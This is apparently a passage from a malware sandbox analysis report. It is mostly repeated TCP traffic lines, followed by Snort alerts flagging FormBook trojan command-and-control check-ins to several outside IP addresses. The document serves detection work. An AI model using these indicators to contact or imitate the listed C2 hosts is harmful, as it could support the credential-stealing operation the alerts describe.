            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49165 -> 66.96.161.166:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49175 -> 194.9.94.86:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49179 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49183 -> 198.12.241.35:80
            Performs DNS queries to domains with low reputation
